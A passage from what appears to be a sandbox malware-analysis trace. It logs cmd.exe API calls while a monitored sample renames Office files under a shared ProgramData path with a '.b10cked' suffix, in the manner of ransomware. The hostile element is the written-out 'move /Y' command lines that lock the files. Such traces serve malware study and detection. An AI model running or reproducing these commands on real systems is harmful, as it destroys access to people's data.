_String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.727] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.728] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.728] _wcsicmp (_String1="MSOINT~1.TRX", _String2=".") returned 63 [0153.728] _wcsicmp (_String1="MSOINT~1.TRX", _String2="..") returned 63 [0153.728] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msoint~1.trx")) returned 0x2020 [0153.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.728] SetErrorMode (uMode=0x0) returned 0x0 [0153.728] SetErrorMode (uMode=0x1) returned 0x0 [0153.728] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", nBufferLength=0x104, lpBuffer=0x18eb7c, lpFilePart=0x18eb64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", lpFilePart=0x18eb64*="MSOINT~1.TRX") returned 0x3c [0153.728] SetErrorMode (uMode=0x0) returned 0x1 [0153.728] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.729] _wcsicmp (_String1="MSOINT~1.TRX", _String2=".") returned 63 [0153.729] _wcsicmp (_String1="MSOINT~1.TRX", _String2="..") returned 63 [0153.729] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msoint~1.trx")) returned 0x2020 [0153.729] SetErrorMode (uMode=0x0) returned 0x0 [0153.729] SetErrorMode (uMode=0x1) returned 0x0 [0153.729] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", nBufferLength=0x104, lpBuffer=0x18eff8, lpFilePart=0x18ed90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", lpFilePart=0x18ed90*="MSOINT~1.TRX") returned 0x3c [0153.729] SetErrorMode (uMode=0x0) returned 0x1 [0153.729] SetErrorMode (uMode=0x0) returned 0x0 [0153.729] SetErrorMode (uMode=0x1) returned 0x0 [0153.729] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f200, lpFilePart=0x18ed90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked", lpFilePart=0x18ed90*="MSOINTL.DLL.trx_dll.b10cked") returned 0x4b [0153.729] SetErrorMode (uMode=0x0) returned 0x1 [0153.729] SetLastError (dwErrCode=0x0) [0153.729] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.dll.trx_dll.b10cked")) returned 0xffffffff [0153.729] GetLastError () returned 0x2 [0153.729] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e70c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e70c) returned 0x282130 [0153.729] FindNextFileW (in: hFindFile=0x282130, lpFindFileData=0x18e70c | out: lpFindFileData=0x18e70c) returned 0 [0153.730] GetLastError () returned 0x12 [0153.730] FindClose (in: hFindFile=0x282130 | out: hFindFile=0x282130) returned 1 [0153.731] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x281cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281cc0) returned 0x282130 [0153.732] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0153.732] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x18e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0153.732] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.dll.trx_dll")) returned 0x2020 [0153.732] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.732] FindClose (in: hFindFile=0x282130 | out: hFindFile=0x282130) returned 1 [0153.732] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e958 | out: _Buffer=" 1") returned 9 [0153.732] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.732] GetFileType (hFile=0x7) returned 0x2 [0153.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.733] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8e4 | out: lpMode=0x18e8e4) returned 1 [0153.733] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.733] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e918 | out: lpConsoleScreenBufferInfo=0x18e918) returned 1 [0153.733] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.734] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e958 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.734] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e93c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e93c*=0x1a) returned 1 [0153.734] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.734] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.734] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.734] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.734] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.734] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.734] SetConsoleInputExeNameW () returned 0x1 [0153.735] GetConsoleOutputCP () returned 0x1b5 [0153.735] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.735] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.735] exit (_Code=0) Process: id = "256" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0x8ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21016 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21017 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21018 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21019 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 21020 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21021 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21022 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21023 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21024 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 21025 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21076 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21077 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21078 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21079 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 21080 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 21081 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21082 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21083 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21084 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21085 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21086 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21087 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21088 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21089 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21090 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21091 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21092 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21093 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 21094 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 21095 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 21096 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 21097 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 21098 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 21099 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 319 os_tid = 0xda8 [0154.213] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f7b4 | out: lpSystemTimeAsFileTime=0x30f7b4*(dwLowDateTime=0x95d92e20, dwHighDateTime=0x1d440a9)) [0154.213] GetCurrentProcessId () returned 0x8ac [0154.213] GetCurrentThreadId () returned 0xda8 [0154.213] GetTickCount () returned 0x2f749 [0154.213] QueryPerformanceCounter (in: lpPerformanceCount=0x30f7ac | out: lpPerformanceCount=0x30f7ac*=21100266309) returned 1 [0154.214] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0154.214] __set_app_type (_Type=0x1) [0154.214] __p__fmode () returned 0x76b331f4 [0154.214] __p__commode () returned 0x76b331fc [0154.214] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0154.215] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0154.215] GetCurrentThreadId () returned 0xda8 [0154.215] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xda8) returned 0x38 [0154.215] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0154.215] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0154.215] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.215] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0154.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f744 | out: phkResult=0x30f744*=0x0) returned 0x2 [0154.215] VirtualQuery (in: lpAddress=0x30f77b, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.215] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0154.215] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0154.215] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.216] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0154.216] GetConsoleOutputCP () returned 0x1b5 [0154.216] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.216] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0154.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.216] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0154.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.216] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0154.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.216] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0154.216] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.216] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0154.217] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.217] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0154.217] GetEnvironmentStringsW () returned 0x4c0210* [0154.217] FreeEnvironmentStringsW (penv=0x4c0210) returned 1 [0154.217] GetEnvironmentStringsW () returned 0x4c0210* [0154.217] FreeEnvironmentStringsW (penv=0x4c0210) returned 1 [0154.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6b4 | out: phkResult=0x30e6b4*=0x40) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0xa0, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x0, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegCloseKey (hKey=0x40) returned 0x0 [0154.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6b4 | out: phkResult=0x30e6b4*=0x40) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x0, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x4) returned 0x0 [0154.218] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0154.218] RegCloseKey (hKey=0x40) returned 0x0 [0154.218] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637c [0154.218] srand (_Seed=0x5b88637c) [0154.218] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"" [0154.218] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked\"" [0154.219] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.219] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0154.219] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0154.219] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 